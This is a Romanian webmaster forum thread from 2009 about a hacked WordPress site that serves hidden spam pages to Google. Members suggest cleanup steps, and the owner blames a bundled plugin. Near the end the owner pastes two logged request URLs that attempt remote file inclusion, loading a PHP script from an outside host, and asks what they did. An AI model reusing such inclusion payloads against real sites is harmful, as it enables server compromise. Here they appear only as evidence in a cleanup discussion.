Site infectat

**Cristi U** · 15th February 2009, 20:05

Postat în original de deadworldisee

bai danielu ca fapt divers sunt mai destept ca tine.
Si sa faci ceva care sa fie indexat in Google si tie sa iti dea not found chiar e usor....

Unde te-a dus gandu....sql injection.....

OK. Cum o pot gasi ? Sau cum pot repara ?

**Andrei Luca** · 15th February 2009, 21:31

In primul rand instalezi User Agent Switcher pentru Firefox -> Googlebot, ca sa vezi in timp real modificarile pe care le faci.
Nu iti ramane decat sa iei la "puricat" fisierele, in special cele din wp-content.
Search in file nu stiu daca ajuta mult, e posibil sa fie generate de la vreun URL criptat.

N-ar strica sa schimbi si parolele de la FTP/Wordpress.

**Cristi U** · 15th February 2009, 23:04

Postat în original de kis

In primul rand instalezi User Agent Switcher pentru Firefox -> Googlebot, ca sa vezi in timp real modificarile pe care le faci.
Nu iti ramane decat sa iei la "puricat" fisierele, in special cele din wp-content.
Search in file nu stiu daca ajuta mult, e posibil sa fie generate de la vreun URL criptat.

N-ar strica sa schimbi si parolele de la FTP/Wordpress.

Parolele le-am schimbat deja, dar tare ma tem ca de degeaba momentan, pana nu curat tot. O sa instalez acum ce mi-ai recomandat.

**Nosfer** · 15th February 2009, 23:28

eu raman la parerea mea: hostingul a fost nesigur. Am patit si eu cu namecheap-ul ceva de genul asta si-mi aparea un <iframe> ciudat in toate index.php-urile, header.php si footer.php de pe server. Am schimbat hostingul, am instalat cele mai noi versiuni de la toate scripturile si am avut grija sa verific toate index.php-urile in parte [un joomla are peste 400 de index.php-uri si au fost MUULTE site-uri cu CMS-ul respectiv pe server]. Dupa ce-am curatat tot, am urcat bazele de date, scripturile curate pe noul hosting si de atunci nu mai e nici o problema...

Cu google cache uita-te din webmaster tools, ca le poti scoate din cache de acolo dar url cu url. Webmaster tools => tools => Remove URLs => Cached copy of a Google search result Remove the cached copy and description of a page that is either outdated or to which you've added a noarchive meta tag.

**Danielu** · 16th February 2009, 00:16

Postat în original de Nosfer

Cu google cache uita-te din webmaster tools, ca le poti scoate din cache de acolo dar url cu url. Webmaster tools => tools => Remove URLs => Cached copy of a Google search result Remove the cached copy and description of a page that is either outdated or to which you've added a noarchive meta tag.

Cred ca are vreo 5-10k de scos url cu url

Chiar daca in cache apar 1200 ele sunt mai multe si cum dispar unele apar altele. Smart virus

**Cristi U** · 16th February 2009, 00:16

Postat în original de kis

In primul rand instalezi User Agent Switcher pentru Firefox -> Googlebot, ca sa vezi in timp real modificarile pe care le faci.
Nu iti ramane decat sa iei la "puricat" fisierele, in special cele din wp-content.
Search in file nu stiu daca ajuta mult, e posibil sa fie generate de la vreun URL criptat.

N-ar strica sa schimbi si parolele de la FTP/Wordpress.

Esti un inger

Se pare ca era de la porcaria de plug in holly dolly, care a venit preinstalat cu versiunea 2.5 daca nu ma insel. Habar n-am cum era exploatat, insa cert e ca dupa ce l-am sters au disparut porcariile alea.

Multumesc

**deadworldisee** · 16th February 2009, 02:34

Deci am avut dreptate ca e de la wordpress si nu host.....

Nosfer chestia cu iframe se cheama trojan iframe/trojan clicker.E un virus pe calcul tau care infecteaza fisierele cu nume index.In momentul cand ai deschisa o conexiune ftp/sftp iti viruseaza si acele fisiere de pe host.

**Cristi U** · 16th February 2009, 02:48

Daca te uiti, eu n-am zis niciodata ca ar fi de la host

Tocmai mi-am instalat plug in-ul http://www.wpwp.org/
si am aruncat o provire peste spideri si alte porcarii si am gasit ceva extrem de ciudat:

Cod PHP:


http://www.pariuri.org/?autoLoadConfig9990autoType=include&autoLoadConfig9990loadFile=http://www.cohul.net/chid.txt???

http://www.pariuri.org/?option=com_contact&Itemid=3//index.php?autoLoadConfig9990autoType=include&autoLoadConfig9990loadFile=http://www.cohul.net/chid.txt???

iar la fisierul ala txt este un cod php... Pentru mine e prima data cand ma lovesc de asemenea porcarii... N-am observat nicio modifcare la site dupa asta... posibil sa fi esuat in ceea ce a vrut sa faca. Poate sa imi spuna cineva ce a vrut sa faca, sau ce a facut?

**dcosmin83** · 16th February 2009, 08:19

legat de parolele ftp , generati o parola din cpanel sa fie cat mai complicata din > 12 carcatere

momentan aceasta este una dintre cele mai mari pb online la care nu s-a gasit o solutie clara

avita salvarea parolelor in softurile de conectare la ftp

**Cristi U** · 16th February 2009, 12:44

Nah, nu stie nimeni despre ce este vorba in linkurile pe care le-am dat in postul anterior?

Subiect: Site infectat

Instrumente subiect

Afișează

Informații subiect

Utilizatori care navighează în acest subiect

Permisiuni postare